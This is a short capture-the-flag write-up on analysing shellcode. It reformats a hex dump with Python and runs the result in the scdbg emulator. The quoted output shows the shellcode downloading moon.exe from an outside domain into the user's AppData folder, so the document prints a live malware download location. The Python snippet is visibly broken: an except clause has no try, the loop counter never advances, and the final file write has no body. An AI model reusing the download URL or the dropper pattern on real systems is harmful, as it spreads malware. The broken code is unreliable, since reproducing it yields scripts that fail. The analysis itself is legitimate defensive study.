Tags: shellcode analysis 


We wget the hexadecimal given file and beautify it (essentialy adding \x)
shellcode = ""
newShellcode = ""

with open("extracted.hex", "r") as f:
shellcode = f.read()

i = 0

while i < len(shellcode):
newShellcode += '\\x'
newShellcode += shellcode[i]
newShellcode += shellcode[i+1]
except IndexError:
newShellcode = newShellcode[:newShellcode.rfind('\\x')]
newShellcode += '\n'

with open("shellcode.txt", "w") as f:
With that beautified code, we need to compile it into a binary with [SandSprite Website](http://sandsprite.com/sc2exe/shellcode_2_exe.php) (Make sure to have select "bytes sc" below)

Then we need to download [scDBG](http://sandsprite.com/CodeStuff/scdbg.zip) and we can start searching for the flag
scdbg.exe -f <file> /findsc
In the load function we can see :
URLDownloadToFileA(http://jmmgroup.ae/moon.exe, C:\Users\Max\AppData\Roaming\ksjmdnu.exe)
--> flag{ksjmdnu.exe}